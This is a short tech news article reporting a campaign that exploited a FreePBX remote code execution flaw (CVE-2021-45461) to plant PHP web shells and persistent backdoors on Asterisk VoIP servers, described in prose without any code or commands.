VoIP Servers targeted by Hackers by exploiting Digium Phone Software

An attack campaign targeted VoIP Phones using Digium’s software to drop a web shell on their servers. This web shell has been designed to exfiltrate data by downloading and executing additional payloads.

Reports stated that the malware first installs multilayer obfuscated PHP backdoors to the web server’s file system. It then downloads new payloads for execution, and schedules recurring tasks to re-infect the host system. 

This irregular activity is said to first commence in mid December 2021. It targets, Asterisks, which is a widely used software implementation of a private-branch exchange (PBX). It runs on the open-source Elastix Unified Communications Server.

Reports stated that the intrusions are similar to the INJ3CTOR3 campaign that was disclosed by Check Point, an Israeli cyber security firm in November 2020. This implies the possibility of resurgence of the previous attacks. 

The sudden surge coincides with the public disclosure of December 2021 of a now-patched remote code execution flaw in FreePBX. It was a web based open source GUI that controlled and managed Asterisk. The issue is rated 9.8 out of 10 for severity and is tracked as CVE-2021-45461. 

The attack first retrieves an initial dropper shell script from a remote server. This in turn orchestrates the shell to install the PHP web shell in different locations in the file system. Additionally it also creates two root user accounts to maintain remote access.

Furthermore a schedule task is created which runs every minute and runs a remote copy of the shell script from the attacker-controlled domain for execution. 

The malware also facilitates running arbitrary commands, allows the hackers to take control of the system, steal information, and maintain a backdoor to the compromised hosts.  

Researchers reported that this is a common approach that malicious actors undertake to launch exploits or run commands remotely. 

 




Readers like you help support The Tech Outlook. When you make a purchase using links on our site, we may earn an affiliate commission. We cannot guarantee the Product information shown is 100% accurate and we advise you to check the product listing on the original manufacturer website. Thetechoutlook is not responsible for price changes carried out by retailers. The discounted price or deal mentioned in this item was available at the time of writing and may be subject to time restrictions and/or limited unit availability. Amazon and the Amazon logo are trademarks of Amazon.com, Inc. or its affiliates Read More

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More